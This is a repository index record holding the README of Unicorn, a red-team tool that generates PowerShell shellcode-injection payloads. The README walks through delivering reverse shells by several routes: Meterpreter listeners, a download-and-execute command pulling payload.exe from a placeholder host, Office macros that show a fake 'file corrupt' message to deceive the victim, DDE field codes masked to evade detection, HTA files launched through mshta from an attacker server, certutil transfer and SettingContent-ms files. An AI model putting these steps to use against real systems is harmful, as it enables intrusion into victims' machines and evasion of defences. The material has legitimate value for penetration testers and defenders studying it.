{"id":13540301,"url":"https://github.com/trustedsec/unicorn","last_synced_at":"2025-05-14T16:12:17.569Z","repository":{"id":41132189,"uuid":"10786172","full_name":"trustedsec/unicorn","owner":"trustedsec","description":"Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.","archived":false,"fork":false,"pushed_at":"2024-01-24T20:02:33.000Z","size":368,"stargazers_count":3813,"open_issues_count":3,"forks_count":816,"subscribers_count":228,"default_branch":"master","last_synced_at":"2025-04-12T20:44:02.141Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"https://www.trustedsec.com","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/trustedsec.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.txt","contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2013-06-19T08:38:06.000Z","updated_at":"2025-04-10T11:43:22.000Z","dependencies_parsed_at":"2024-01-22T04:08:32.760Z","dependency_job_id":"8a124c8c-45dc-4126-bc64-b8914e84bd67","html_url":"https://github.com/trustedsec/unicorn","commit_stats":null,"previous_names":[],"tags_count":92,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Funicorn","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Funicorn/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Funicorn/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Funicorn/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/trustedsec","download_url":"https://codeload.github.com/trustedsec/unicorn/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254179905,"owners_count":22027884,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T09:01:46.051Z","updated_at":"2025-05-14T16:12:17.530Z","avatar_url":"https://github.com/trustedsec.png","language":"Python","readme":"unicorn\n=======\n\nWritten by: Dave Kennedy (@HackingDave)\nWebsite: https://www.trustedsec.com\n\nMagic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.\n\nUsage is simple, just run Magic Unicorn (ensure Metasploit is installed if using Metasploit methods and in the right path) and magic unicorn will automatically generate a powershell command that you need to simply cut and paste the powershell code into a command line window or through a payload delivery system. Unicorn supports your own shellcode, cobalt strike, and Metasploit.\n```\nroot@rel1k:~/Desktop# python unicorn.py \n\n ,/\n //\n ,//\n ___ /| |//\n `__/\\_ --(/|___/-/\n \\|\\_-\\___ __-_`- /-/ \\.\n |\\_-___,-\\_____--/_)' ) \\\n \\ -_ / __ \\( `( __`\\|\n `\\__| |\\)\\ ) /(/|\n ,._____., ',--//-| \\ | ' /\n / __. \\, / /,---| \\ /\n / / _. \\ \\ `/`_/ _,' | |\n | | ( ( \\ | ,/\\'__/'/ | |\n | \\ \\`--, `_/_------______/ \\( )/\n | | \\ \\_. \\, \\___/\\\n | | \\_ \\ \\ \\\n \\ \\ \\_ \\ \\ / \\\n \\ \\ \\._ \\__ \\_| | \\\n \\ \\___ \\ \\ | \\\n \\__ \\__ \\ \\_ | \\ |\n | \\_____ \\ ____ | |\n | \\ \\__ ---' .__\\ | | |\n \\ \\__ --- / ) | \\ /\n \\ \\____/ / ()( \\ `---_ /|\n \\__________/(,--__ \\_________. | ./ |\n | \\ \\ `---_\\--, \\ \\_,./ |\n | \\ \\_ ` \\ /`---_______-\\ \\\\ /\n \\ \\.___,`| / \\ \\\\ \\\n \\ | \\_ \\| \\ ( |: |\n \\ \\ \\ | / / | ;\n \\ \\ \\ \\ ( `_' \\ |\n \\. \\ \\. \\ `__/ | |\n \\ \\ \\. \\ | |\n \\ \\ \\ \\ ( )\n \\ | \\ | | |\n | \\ \\ \\ I `\n ( __; ( _; ('-_';\n |___\\ \\___: \\___:\n\n\naHR0cHM6Ly93d3cuYmluYXJ5ZGVmZW5zZS5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTcvMDUvS2VlcE1hdHRIYXBweS5qcGc=\n\n \n-------------------- Magic Unicorn Attack Vector -----------------------------\n\nNative x86 powershell injection attacks on any Windows platform.\nWritten by: Dave Kennedy at TrustedSec (https://www.trustedsec.com)\nTwitter: @TrustedSec, @HackingDave\nCredits: Matthew Graeber, Justin Elze, Chris Gates\n\nHappy Magic Unicorns.\n\nUsage: python unicorn.py payload reverse_ipaddr port \u003coptional hta or macro, crt\u003e\nPS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443\nPS Down/Exec: python unicorn.py windows/download_exec url=http://badurl.com/payload.exe\nMacro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro\nMacro Example CS: python unicorn.py \u003ccobalt_strike_file.cs\u003e cs macro\nMacro Example Shellcode: python unicorn.py \u003cpath_to_shellcode.txt\u003e shellcode macro\nHTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta\nHTA Example CS: python unicorn.py \u003ccobalt_strike_file.cs\u003e cs hta\nHTA Example Shellcode: python unicorn.py \u003cpath_to_shellcode.txt\u003e: shellcode hta\nDDE Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 dde\nCRT Example: python unicorn.py \u003cpath_to_payload/exe_encode\u003e crt\nCustom PS1 Example: python unicorn.py \u003cpath to ps1 file\u003e\nCustom PS1 Example: python unicorn.py \u003cpath to ps1 file\u003e macro 500\nCobalt Strike Example: python unicorn.py \u003ccobalt_strike_file.cs\u003e cs (export CS in C# format)\nCustom Shellcode: python unicorn.py \u003cpath_to_shellcode.txt\u003e shellcode (formatted 0x00)\nHelp Menu: python unicorn.py --help\n```\n\n### -----POWERSHELL ATTACK INSTRUCTIONS----\n\nEverything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the powershell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc.. There are so many implications and scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the powershell code will download the payload and execute.\n\nNote that you will need to have a listener enabled in order to capture the attack.\n\n### -----MACRO ATTACK INSTRUCTIONS----\n\nFor the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you do\nthat, you will have a developer tab. Create a new macro, call it Auto_Open and paste the generated code\ninto that. This will automatically run. Note that a message will prompt to the user saying that the file\nis corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the\nvictim to thinking the excel document is corrupted. You should get a shell through powershell injection\nafter that.\n\nIf you are deploying this against Office365/2016+ versions of Word you need to modify the first line of \nthe output from: Sub Auto_Open()\n \nTo: Sub AutoOpen()\n \nThe name of the macro itself must also be \"AutoOpen\" instead of the legacy \"Auto_Open\" naming scheme.\n\nNOTE: WHEN COPYING AND PASTING THE EXCEL, IF THERE ARE ADDITIONAL SPACES THAT ARE ADDED YOU NEED TO\nREMOVE THESE AFTER EACH OF THE POWERSHELL CODE SECTIONS UNDER VARIABLE \"x\" OR A SYNTAX ERROR WILL\nHAPPEN!\n\n### -----HTA ATTACK INSTRUCTIONS----\n\nThe HTA attack will automatically generate two files, the first the index.html which tells the browser to\nuse Launcher.hta which contains the malicious powershell injection code. All files are exported to the\nhta_access/ folder and there will be three main files. The first is index.html, second Launcher.hta and the\nlast, the unicorn.rc file. You can run msfconsole -r unicorn.rc to launch the listener for Metasploit.\n\nA user must click allow and accept when using the HTA attack in order for the powershell injection to work\nproperly.\n\n### -----CERTUTIL Attack Instruction----\n\nThe certutil attack vector was identified by Matthew Graeber (@mattifestation) which allows you to take\na binary file, move it into a base64 format and use certutil on the victim machine to convert it back to\na binary for you. This should work on virtually any system and allow you to transfer a binary to the victim\nmachine through a fake certificate file. To use this attack, simply place an executable in the path of\nunicorn and run python unicorn.py \u003cexe_name\u003e crt in order to get the base64 output. Once that's finished,\ngo to decode_attack/ folder which contains the files. The bat file is a command that can be run in a\nwindows machine to convert it back to a binary.\n\n\n### -----Custom PS1 Attack Instructions----\n\nThis attack method allows you to convert any PowerShell file (.ps1) into an encoded command or macro.\n\nNote if choosing the macro option, a large ps1 file may exceed the amount of carriage returns allowed by\nVBA. You may change the number of characters in each VBA string by passing an integer as a parameter.\n\nExamples:\n\n python unicorn.py harmless.ps1\n python unicorn.py myfile.ps1 macro\n python unicorn.py muahahaha.ps1 macro 500\n\nThe last one will use a 500 character string instead of the default 380, resulting in less carriage returns in VBA.\n\n\n\n\n### -----DDE Office COM Attack Instructions----\n\nThis attack vector will generate the DDEAUTO formulate to place into Word or Excel. The COM object \nDDEInitilize and DDEExecute allow for formulas to be created directly within Office which causes the\nability to gain remote code execution without the need of macros. This attack was documented and full\ninstructions can be found at:\n\nhttps://sensepost.com/blog/2017/macro-less-code-exec-in-msword/\n\nIn order to use this attack, run the following examples:\n\n python unicorn.py \u003cpayload\u003e \u003clhost\u003e \u003clport\u003e dde\n python unicorn.py windows/meterpreter/reverse_https 192.168.5.5 443 dde\n\nOnce generated, a powershell_attack.txt will be generated which contains the Office code, and the\nunicorn.rc file which is the listener component which can be called by msfconsole -r unicorn.rc to\nhandle the listener for the payload. In addition a download.ps1 will be exported as well (explained\nin the latter section).\n\nIn order to apply the payload, as an example (from sensepost article):\n\n1. Open Word\n2. Insert tab -\u003e Quick Parts -\u003e Field\n3. Choose = (Formula) and click ok.\n4. Once the field is inserted, you should now see \"!Unexpected End of Formula\"\n5. Right-click the Field, choose \"Toggle Field Codes\"\n6. Paste in the code from Unicorn\n7. Save the Word document.\n\nOnce the office document is opened, you should receive a shell through powershell injection. Note\nthat DDE is limited on char size and we need to use Invoke-Expression (IEX) as the method to download.\n\nThe DDE attack will attempt to download download.ps1 which is our powershell injection attack since\nwe are limited to size restrictions. You will need to move the download.ps1 to a location that is\naccessible by the victim machine. This means that you need to host the download.ps1 in an Apache2\ndirectory that it has access to.\n\nYou may notice that some of the commands use \"{ QUOTE\" these are ways of masking specific commands\nwhich is documented here: http://staaldraad.github.io/2017/10/23/msword-field-codes/. In this case\nwe are changing WindowsPowerShell, powershell.exe, and IEX to avoid detection. Also check out the URL\nas it has some great methods for not calling DDE at all.\n\n### -----Import Cobalt Strike Beacon----\n\nThis method will import direct Cobalt Strike Beacon shellcode directly from Cobalt Strike.\n\nWithin Cobalt Strike, export the Cobalt Strike \"CS\" (C#) export and save it to a file. For example, call \nthe file, cobalt_strike_file.cs. \n\nThe export code will look something like this:\n\n* length: 836 bytes */\nbyte[] buf = new byte[836] { 0xfc, etc\n\nNext, for usage:\n\n python unicorn.py cobalt_strike_file.cs cs\n\nThe cs argument tells Unicorn that you want to use the Cobalt strike functionality. The rest is Magic.\n\nNext simply copy the powershell command to something you have the ability for remote command execution.\n\nNOTE: THE FILE MUST BE EXPORTED IN THE C# (CS) FORMAT WITHIN COBALT STRIKE TO PARSE PROPERLY.\n\nThere are some caveats with this attack. Note that the payload size will be a little over 14k+ in byte\nsize. That means that from a command line argument perspective if you copy and paste you will hit the\n8191 character size restriction (hardcoded into cmd.exe). If you are launching directly from cmd.exe\nthis is an issue, however if you are launching directly from PowerShell or other normal applications\nthis is a non-problem.\n\nA couple examples here, wscript.shell and powershell uses USHORT - 65535 / 2 = 32767 size limit:\n\n typedef struct _UNICODE_STRING {\n USHORT Length;\n USHORT MaximumLength;\n PWSTR Buffer;\n } UNICODE_STRING;\n\nFor this attack if you are launching directly from powershell, VBSCript (WSCRIPT.SHELL), there is no\nissues.\n\n### -----Custom Shellcode Generation Method----\n\nThis method will allow you to insert your own shellcode into the Unicorn attack. The PowerShell code\nwill increase the stack side of the powershell.exe (through VirtualAlloc) and inject it into memory.\n\nNote that in order for this to work, your txt file that you point Unicorn to must be formatted in the \nfollowing format or it will not work:\n\n0x00,0x00,0x00 and so on.\n\nAlso note that there is size restrictions. The total length size of the PowerShell command cannot exceed\nthe size of 8191. This is the max command line argument size limit in Windows.\n\nUsage:\n\n python unicorn.py shellcode_formatted_properly.txt shellcode\n\nNext simply copy the powershell command to something you have the ability for remote command execution.\n\nNOTE: THE FILE MUST PROPERLY BE FORMATTED IN A 0x00,0x00,0x00 TYPE FORMAT WITH NOTHING ELSE OTHER THAN\nYOUR SHELLCODE IN THE TXT FILE.\n\nThere are some caveats with this attack. Note that if your payload size is large in nature it will not\nfit in cmd.exe. That means that from a command line argument perspective if you copy and paste you will \nhit the 8191 character size restriction (hardcoded into cmd.exe). If you are launching directly from \ncmd.exe this is an issue, however if you are launching directly from PowerShell or other normal \napplications this is a non-problem.\n\nA couple examples here, wscript.shell and powershell uses USHORT - 65535 / 2 = 32767 size limit:\n\n typedef struct _UNICODE_STRING {\n USHORT Length;\n USHORT MaximumLength;\n PWSTR Buffer;\n } UNICODE_STRING;\n\nFor this attack if you are launching directly from powershell, VBSCript (WSCRIPT.SHELL), there is no \nissues.\n\n### -----SettingContent-ms Extension Method----\n\n\nFirst, if you haven't had a chance, head over to the awesome SpectreOps blog from Matt Nelson (enigma0x3):\n\nhttps://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39\n\nThis method uses a specific file type called \".SettingContent-ms\" which allows for the ability for both\ndirect loads from browsers (open + command execution) as well as extension type through embedding in \noffice products. This one specifically will focus on extension type settings for command execution\nwithin Unicorn's PowerShell attack vector.\n\nThere are multiple methods supported with this attack vector. Since there is a limited character size\nwith this attack, the method for deployment is an HTA. \n\nFor a detailed understanding on weaponizing this attack visit:\n\nhttps://www.trustedsec.com/2018/06/weaponizing-settingcontent/\n\nThe steps you'll need to do to complete this attack is generate your .SettingContent-ms file from\neither a standalone or hta. The HTA method supports Metasploit, Cobalt Strike, and direct\nshellcode attacks.\n\nThe four methods below on usage: \n\nHTA SettingContent-ms Metasploit: `python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 ms` \nHTA Example SettingContent-ms: `python unicorn.py \u003ccobalt_strike_file.cs cs ms` \nHTA Example SettingContent-ms: `python unicorn.py \u003cpath_to_shellcode.txt\u003e: shellcode ms` \nGenerate .SettingContent-ms: `python unicorn.py ms`\n\nThe first is a Metasploit payload, the second a Cobalt Strike, the third your own shellcode, and the fourth\njust a blank .SettingContent-ms file. \n\nWhen everything is generated, it will export a file called Standalone_NoASR.SettingContent-ms either in\nthe default root Unicorn directory (if using the standalone file generation) or under the hta_attack/\nfolder. You will need to edit the Standalone_NoASR.SettingContent-ms file and replace:\n\nREPLACECOOLSTUFFHERE\n\nWith:\n\nmshta http://\u003capache_server_ip_or_dns_name/Launcher.hta.\n\nThen move the contents of the hta_attack to /var/www/html.\n\nOnce the victim either clicks the .SettingContent-ms file, mshta will be called on the victim machine\nthen download the Unicorn HTA file which has the code execution capabilities. \n\nSpecial thanks and kudos to Matt Nelson for the awesome research\n\nAlso check out: https://www.trustedsec.com/2018/06/weaponizing-settingcontent/\n\nUsage: \n\n python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 ms\n python unicorn.py \u003ccobalt_strike_file.cs cs ms\n python unicorn.py \u003cpatth_to_shellcode.txt\u003e: shellcode ms\n python unicorn.py ms\n\n","funding_links":[],"categories":["Tools","Python","\u003ca id=\"983f763457e9599b885b13ea49682130\"\u003e\u003c/a\u003eWindows","\u003ca id=\"3ed50213c2818f1455eff4e30372c542\"\u003e\u003c/a\u003e工具","Windows Utilities","Exploit Development Tools","Pentesting","Programming/Comp Sci/SE Things"],"sub_categories":["Windows Utilities","\u003ca id=\"86dc226ae8a71db10e4136f4b82ccd06\"\u003e\u003c/a\u003e密码","\u003ca id=\"caab36bba7fa8bb931a9133e37d397f6\"\u003e\u003c/a\u003eWindows","Penetration Testing Report Templates","Forensics","Zealandia","ShellCodes","3\\. Exploitation"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftrustedsec%2Funicorn","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftrustedsec%2Funicorn","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftrustedsec%2Funicorn/lists"}